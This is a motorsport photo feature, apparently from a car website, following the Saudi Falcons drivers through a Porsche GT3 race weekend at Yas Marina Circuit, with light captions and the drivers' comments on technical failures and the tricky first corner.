While we were there, we caught up with The Saudi Falcons and its drivers – Abdulaziz Turki AlFaisal and Faisal Binladen – to see just what’s involved during a Porsche GT3 race weekend. As it turns out, it’s not quite as easy as these guys make it look.
‘scuse me guys, we’re not experts or anything, but wouldn’t they run better with the wheels on?
ATF: “We’re going to go and do what we do best!” All set for a weekend of racing in the #17 Saudi Falcons Racing GT3 entry.
crankandpiston found it is difficult to look at a timing monitor without sticking your tongue out. It’s a mark of concentration apparently.
ATF: “In racing, technical failures, which happened to Clemens [Schmid] today, can happen to anyone. And you have to push as hard as you can, but if something breaks then you’re out.” Words of wisdom as ATF heads out on-rack for qualifying using the Yas Marina Circuit’s unique pit exit configuration…

ATF: “The first corner is very tricky, because it tends to tempt you to use more speed than you should, and then the rear starts to move.” Having braved turn one, ATF’s #7 machine is now barrelling towards the long sweeping turn three. Grip and a well-balanced car is key.
